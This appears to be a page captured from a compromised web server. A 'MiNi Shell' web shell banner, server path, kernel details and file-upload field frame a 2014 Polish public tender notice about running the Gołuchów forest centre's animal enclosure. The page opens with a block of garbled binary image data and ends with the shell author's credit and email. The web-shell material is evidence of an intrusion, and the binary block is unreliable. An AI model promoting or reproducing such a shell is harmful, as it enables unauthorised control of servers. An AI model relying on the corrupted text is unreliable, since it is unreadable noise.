JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141015/341434-N-2014.html

<p class="kh_header"><b>Gołuchów: OBSŁUGA I NADZÓR POKAZOWEJ ZAGRODY ZWIERZĄT W OŚRODKU KULTURY LEŚNEJ W GOŁUCHOWIE w LATACH  2015-2017</b><br>
<b>Numer ogłoszenia: 341434 - 2014; data zamieszczenia: 15.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Kultury Leśnej w Gołuchowie , ul. Działyńskich 2, 63-322 Gołuchów, woj. wielkopolskie, tel. 62 7615045, 7615046, faks 62 7615046.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.okl.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OBSŁUGA I NADZÓR POKAZOWEJ ZAGRODY ZWIERZĄT W OŚRODKU KULTURY LEŚNEJ W GOŁUCHOWIE w LATACH  2015-2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Obsługa i nadzór nad Pokazową Zagrodą Zwierząt Ośrodka Kultury Leśnej w Gołuchowie w oddz. 32, 33 oraz zagrodą danieli w oddz.11f  w okresie od 1 grudnia 2014 r. do 30 listopada 2017 r. 
Zamówienie obejmuje następujące czynności:
a) Bezpośredni nadzór nad zagrodą dotyczący w całości oddziałów 32 i 33(zał. nr 5) oraz 11f (zał. nr 8) wg harmonogramu:
- m-c 	grudzień	godz.   7:00 - 16:00
- 	styczeń		7:00 - 17:00
-	luty (1-15)		7:00 - 17:00
		     (16-28)		7:00 - 17:30
-	marzec 		7:00 - 18:00 (do zmiany czasu)
		          			7:00 - 19:00 (po zmianie czasu)	
-	kwiecień		7:00 - 21:00
-	maj			7:00 - 21:00
-	czerwiec		7:00 - 21:00
-	lipiec			7:00 - 21:00
-	sierpień		7:00 - 21:00
-	wrzesień		7:00 - 20:00
-	październik		7:00 - 18:00 (do zmiany czasu)
		                 		7:00 - 17:00 (po zmianie czasu)
-	listopad (1-15)	7:00 - 17:00
		           (16-30)		7:00 - 16:30
Wykonawca zobowiązany jest do:
1.Przedstawienia wykazu pracowników zatrudnionych na terenie PZZ
2.Pisemnego informowania Zamawiającego o wszelkich zmianach w składzie osobowym obsługi zagrody
3.Przedkładania Zamawiającemu imiennego harmonogramu dyżurów na każdy miesiąc,
   przed jego rozpoczęciem. 
4.Prowadzenie Książki dyżurów (wzór w Załączniku nr1.)
			
b) Przygotowanie, zadawanie i magazynowanie karmy dla zwierząt
1. Przygotowanie i zadawanie karmy w Pokazowej Zagrodzie Zwierząt w oddz. 32,33  zgodnie z normami i zaleceniami określonymi przez zamawiającego (Załącznik nr 2) każdego dnia, w dwóch karmieniach każde po połowie dawki dziennej. Karmienie pierwsze należy przeprowadzić rano po rozpoczęciu dyżuru; natomiast drugie - wieczorne na 1 godzinę przed zakończeniem dyżuru. Daniele w zagrodzie w oddz. 11f otrzymują karmę 3 razy w tygodniu (poniedziałki, środy, piątki) raz dziennie wg norm. Karma w odpowiednich ilościach nabywana przez Zamawiającego jest przekazywana w częściach lub całości przez pracownika  OKL pracownikowi pełniącemu dyżur w danym dniu i sporządza się dokument zdawczo - odbiorczy w formie Protokołu ważenia -wzór - Załącznik nr 3 
Systematyczne uzupełnianie wody w poidłach dla pojenia zwierząt w oddz. 11f, 32, 33 - zał. nr 5 i 8.
2. Rozładunek, magazynowanie oraz transport wewnętrzny karmy 
(z magazynu OKL - oddz. 7d na teren PZZ oraz pomiędzy paśniko - magazynami, transport karmy dla danieli w zagrodzie w oddz. 11f
3. Napełnianie silosa mieszanką zbożową oraz opróżnianie - przy częściowym wydawaniu zboża lub ostatecznym opróżnianiem silosa
4. Dbałość o należyty stan powierzonej i zadawanej zwierzętom karmy oraz czystość wody w poidłach
5. Systematyczne, codzienne sporządzanie - wpis w formularzu miesięcznych obroczników wykazujących rzeczywiste zużycie karmy - formularz do wglądu na żądanie Zamawiającego oraz jako miesięczne rozliczenie dokument dostarczony do siedziby OKL.- Załącznik nr 4 
6. Przygotowanie wg pisemnego wskazania Zamawiającego 
-zapasów liściarki/ ilość wg wskazania
- przywóz i wyłożenie świeżych gałęzi  ilość wg wskazania
7. Uzgadnianie stanów karmy z kartoteką na koniec każdego miesiąca.
c) Utrzymanie w należytym stanie zdrowotnym i właściwej kondycji zwierząt poprzez:
1. Codzienne usuwanie odchodów z powierzchni utwardzonej przy paśnikach w dziennych zagrodach żubrów, danieli i koników w oddz. 32
2. Wywóz kału i obornika z terenu dziennych zagród w oddz. 32 - przynajmniej 1 raz w miesiącu oraz przewożenie w miejsce wyznaczone przez zamawiającego - do 25 każdego miesiąca
3. Realizację zaleceń weterynaryjnych w pełnym zakresie wg wskazówek lekarza weterynarii
4. Przygotowanie kąpielisk piaskowych łącznie z przywozem piasku, zakupionego przez Zamawiającego.
5. Izolowanie zwierząt - wg zaleceń Zamawiającego
6. Organizacja i obsługa odłowów zwierząt w pełnym zakresie, tj. załadunek do 
skrzyni transportowej, załadunek skrzyni na środek transportu oraz zapewnienie sprzętu i pracowników do wykonania ww. czynności
7. Obsługa przyjęcia nowych zwierząt (analogicznie j.w.): rozładunek, wypuszczenie do izolatki, łączenie ze stadem 
8. Obserwacja zachowań zwierząt
9. Zgłaszanie Zamawiającemu wszelkich stwierdzonych nieprawidłowości z jednoczesnym wpisem do Książki dyżurów
10. Informowanie o narodzinach zwierząt (należy podać datę, płeć, imię matki) 
z jednoczesnym wpisem w Książkę dyżurów i na koniec miesiąca w Obrocznik
d) Utrzymanie w należytym stanie obiektów i terenu PZZ tj. oddziałów 32 i 33, poprzez:
1. Zachowanie porządku i czystości 
2. Usuwanie i wywóz śmieci z terenu i otoczenia zagrody (wg szkicu - Załącznik nr 5)
3. Zgrabianie i wywóz liści, gałęzi itp. z terenu jw. 
4. Czyszczenie rynien
5. Drobne naprawy sprzętu i obiektów 
6. Zabezpieczenie przed skutkami zimy, odśnieżanie, posypywanie piaskiem podestów oraz dojścia - począwszy od drogi do Turska ( wg szkicu -Załącznik nr 5 )
7. Zabezpieczanie drzew przed zwierzętami, w tym m.in. luzowanie siatki 
8. Dbałość o zabezpieczenie p.poż. terenu i obiektów wg instrukcji p.poż.
9. Codzienne sprawdzanie stanu ogrodzenia potwierdzone zapisem w Książce dyżurów oraz zgłaszanie uszkodzeń 
e) Obsługa i nadzór nad ruchem turystycznym
1. Udzielanie informacji o zwierzętach
2. Egzekwowanie przestrzegania Regulaminu zwiedzania Zagrody 
3. Ewidencjonowanie frekwencji zwiedzających w Książce dyżurów oraz zestawienie
łącznej ilości zwiedzających na koniec każdego miesiąca
4. Wykonywanie bieżących ustaleń Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.50.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 1 500,00 zł (słownie: jeden tysiąc pięćset 00/100 złotych).
Wadium musi obejmować okres związania ofertą,  
Termin wniesienia wadium upływa najpóźniej 23 październik 2014r. do godz.10:30.
FORMY I MIEJSCE WNOSZENIA WADIUM
Wadium może być wnoszone w jednej lub kilku następujących formach:
-w pieniądzu - przelewem na rachunek zamawiającego w Banku  
Zachodnim WBK S.A. 9 Oddział w Kaliszu, nr konta: 84 10901128 0000 00001201 5667; 
-w poręczeniach bankowych poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-Gwarancjach bankowych;
-w gwarancjach ubezpieczeniowych;
-w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ).
O uznaniu przez zamawiającego, że wadium w pieniądzu wpłacono 
w wymaganym terminie, decyduje data wpływu środków na rachunek zamawiającego. Wykonawca, który nie wniesie wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu związania ofertą, zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego.
Złożone poręczenie lub gwarancja musi zawierać zobowiązanie zgodne 
z art. 46 ust. 5 ustawy Prawo zamówień publicznych- zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy na zasadach określonych w specyfikacji istotnych warunków zamówienia,
3)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
Zamawiający dokona zwrotu wadium w kasie OKL Gołuchów  ul. Działyńskich 2, 62-322 Gołuchów lub przekaże dyspozycję do banku zgodnie z warunkami określonymi w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2. Aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3. Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

4. Aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego, potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, opłat lub, uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji Naczelnika Urzędu Skarbowego, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

5. Aktualnego zaświadczenia z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji oddziału Zakładu Ubezpieczeń Społecznych, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6. Oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 Prawa zamówień publicznych - podpisany zał. nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Sporządzenia i załączenia do oferty wykazu wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu należy załączyć dokumenty potwierdzające, że wszystkie wykazane usługi zostały wykonane należycie.
Wymagane jest wykazanie co najmniej 1 należycie wykonanej usługi dla firm prywatnych i instytucji o wartości brutto nie mniejszej niż połowa wartości zaoferowanej w przetargu ceny.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww. warunek mogą spełnić łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób i podmiotów, które będą wykonywać zamówienia lub będą uczestniczyć w wykonywaniu zamówienia - warunek wiek zatrudnionego min. 18 lat.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zaświadczenie o sytuacji finansowej 
Oferent musi dysponować aktywami płynnymi i kredytami, po odjęciu innych zobowiązań kontraktowych oraz wszelkiego rodzaju zaliczek, które mogą być wpłacone w ramach kontraktu , w wysokości nie mniejszej niż 50 000,00 zł, słownie :pięćdziesiąt tysięcy 00/100 zł.
2. Załączenia do oferty polisy lub innego dokumentu ubezpieczenia, potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej z załączonym zaświadczeniem dokonanej aktualnej opłaty składkowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/okl_goluchow/zamowienia_publicze<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Kultury Leśnej  w Gołuchowie, ul. Działyńskich 2, 63-322 Gołuchów -Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2014 godzina 10:30, miejsce: Ośrodek Kultury Leśnej  w Gołuchowie, ul. Działyńskich 2, 63-322 Gołuchów -Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com